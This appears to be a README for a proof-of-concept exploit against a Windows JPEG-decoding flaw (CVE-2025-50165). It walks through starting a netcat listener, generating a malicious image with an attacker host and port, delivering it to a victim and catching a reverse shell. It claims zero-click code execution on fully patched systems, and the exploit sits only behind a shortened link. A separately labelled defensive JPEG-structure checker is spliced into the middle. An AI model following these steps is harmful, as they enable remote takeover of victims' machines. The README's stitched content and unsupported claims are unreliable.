
CVE-2025-50165 PoC — Microsoft Graphics Component Security Vulnerability

Source
Associated Vulnerability
Title: Microsoft Graphics Component Security Vulnerability (CVE-2025-50165)
Description: Microsoft Graphics Component is a graphics driver component from Microsoft Corporation of the United States. Microsoft Graphics Component has a security vulnerability. An attacker can exploit this vulnerability to execute code. The following products and versions are affected: Windows Server 2025 (Server Core installation), Windows 11 Version 24H2 for ARM64-based Systems, Windows 11 Version 24H2 for x64-based Syste
Readme
## Proof-of-Concept exploit for the Untrusted Pointer Dereference vulnerability in Windows Graphics Component (CVE-2025-50165).

### **Disclaimer**

This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.

### **Technical Analysis**

The vulnerability exists within the Windows Graphics Component, specifically in the parsing of specially crafted image files. This exploit targets the JPEG decoding process. By embedding a malformed metadata segment within a JPEG file, an attacker can trigger an untrusted pointer dereference (CWE-822).

The core of the exploit involves crafting a JPEG file that, when rendered, causes the codec to read from a controlled memory address and execute its contents. This is achieved through heap spraying, where the payload is placed into a predictable memory location. The malformed segment then points the instruction pointer to our shellcode, resulting in remote code execution on the target system without any user interaction. The attack vector is viable through web browsers, email clients, and any application that utilizes the underlying Windows API for rendering JPEG images.
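As a defender-side triage aid, added here and not part of the original PoC or any code from this page, the following walker parses the JPEG marker segments the analysis above refers to and flags a metadata (APPn) segment whose declared length does not fit the file. It checks container structure only and does not detect this CVE specifically; both sample byte strings are constructed for the example.

```python
# Markers that carry no length field (SOI, EOI, TEM, RSTn).
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))

def walk_jpeg_segments(data: bytes):
    """Walk JPEG marker segments; return (segments, findings).

    segments: (marker, offset, length) per length-carrying segment up to SOS.
    findings: length fields that do not fit the file (structure checks only).
    """
    segments, findings = [], []
    if data[:2] != b"\xff\xd8":
        return segments, ["missing SOI marker at offset 0"]
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            findings.append(f"expected marker at offset {pos}, found 0x{data[pos]:02x}")
            break
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte before a marker; skip it
            pos += 1
            continue
        if marker in STANDALONE:
            if marker == 0xD9:  # EOI
                break
            pos += 2
            continue
        if pos + 4 > len(data):
            findings.append(f"marker 0x{marker:02x} at offset {pos} has a truncated length field")
            break
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # includes the 2 length bytes
        if length < 2:
            findings.append(f"marker 0x{marker:02x} at offset {pos} declares impossible length {length}")
            break
        if pos + 2 + length > len(data):
            findings.append(f"marker 0x{marker:02x} at offset {pos} declares length {length}, "
                            f"exceeding the file by {pos + 2 + length - len(data)} bytes")
            break
        segments.append((marker, pos, length))
        if marker == 0xDA:  # SOS: entropy-coded data follows, stop walking
            break
        pos += 2 + length
    return segments, findings

# Constructed sample: SOI, then an APP1 (Exif) segment whose declared length
# 0x1000 runs far past the end of this 14-byte file, then EOI.
MALFORMED_SAMPLE = b"\xff\xd8\xff\xe1\x10\x00Exif\x00\x00\xff\xd9"
# Constructed well-formed sample: SOI, APP0 with a consistent length of 4, EOI.
WELLFORMED_SAMPLE = b"\xff\xd8\xff\xe0\x00\x04\x00\x00\xff\xd9"
```

Run it over a quarantined image before handing the file to any decoder; a declared segment length that overruns the file is a cheap reason to stop processing.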

### **Usage**

The exploit is generated using a Python script. It creates a malicious `.jpg` file that will trigger the vulnerability.

1.  **Set up a listener** to receive the reverse shell. Netcat is a simple option:

    ```bash
    nc -lvnp 4444
    ```

2.  **Generate the exploit image:**
    Run the `generate_payload.py` script, providing your listener's IP address and port.

    ```bash
    python3 generate_payload.py --lhost <your_ip> --lport 4444 --output exploit.jpg
    ```

3.  **Deliver the payload.**
    Transfer the `exploit.jpg` file to the victim machine. The vulnerability will be triggered as soon as the file is processed for display (e.g., viewing it in a folder with thumbnails enabled, opening it in an image viewer, or embedding it on a webpage).

4.  **Receive the connection.**
    Your listener should receive a connection from the victim machine, providing a remote command shell.

### **Demo**

The following demonstration shows the exploit in action. A listener is started on the attacker's machine. The generated `exploit.jpg` file is opened on a fully patched Windows 11 24H2 machine, and a reverse shell is immediately established.

`demo.mp4`

### Exploit
[href](https://tinyurl.com/3cyha48t)

For any inquiries, please email me at: anthonmullins@op.pl
File Snapshot

[4.0K] /data/pocs/fc0d385c361f945b519f8721f85eb5de4871d5f6
└── [2.5K] README.md
1 directory, 1 file